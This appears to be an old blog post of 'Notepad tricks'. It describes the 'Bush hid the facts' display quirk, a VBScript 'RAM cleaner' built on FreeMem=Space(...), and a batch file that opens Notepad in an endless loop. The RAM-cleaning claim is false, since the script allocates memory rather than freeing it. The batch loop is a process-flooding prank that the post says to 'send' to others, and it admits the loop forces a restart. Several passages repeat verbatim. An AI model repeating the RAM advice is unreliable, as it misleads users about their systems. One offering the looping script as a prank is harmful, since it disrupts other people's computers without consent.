- Open Notepad.
- Type “BUSH HID THE FACTS” or “this app can break” (without quotes).
- Save that file with any name and close it.
- Open It Again to see the magic.
Thursday, October 7, 2010
Bush Hid the Facts/This App Can Break
This is one of the most popular notepad tricks because of its mysterious nature. In order to get an idea as to what this trick does, just follow the steps given below:
Freeup or clean RAM using Notepad
Open Notepad
Type
FreeMem=Space(64000000)
save it as “CleanRAM.vbs” on desktop
Note: Type the name of file along with inverted commas
Run the file and your RAM may be free.
Of course you can edit the code in the file for a greater “cleaning-progress”.
For example:
FreeMem=Space(1280000000)
FreeMem=Space(2560000000)
FreeMem=Space(5120000000)
FreeMem=Space(10240000000)
Type
FreeMem=Space(64000000)
save it as “CleanRAM.vbs” on desktop
Note: Type the name of file along with inverted commas
Run the file and your RAM may be free.
Of course you can edit the code in the file for a greater “cleaning-progress”.
For example:
FreeMem=Space(1280000000)
FreeMem=Space(2560000000)
FreeMem=Space(5120000000)
FreeMem=Space(10240000000)
Notepad Trick to Open notepad continuously
Type the code in notepad as :
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Save it as “notepad.BAT” and send it.
Note: If you want to try it, then go ahead and when you built this file double click to open it. But beware it slows your system and you will be left with no other option than to restart, as this script opens 100’s of notepad window. So, If you want to try this than save all your work and then run this file.
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Save it as “notepad.BAT” and send it.
Note: If you want to try it, then go ahead and when you built this file double click to open it. But beware it slows your system and you will be left with no other option than to restart, as this script opens 100’s of notepad window. So, If you want to try this than save all your work and then run this file.
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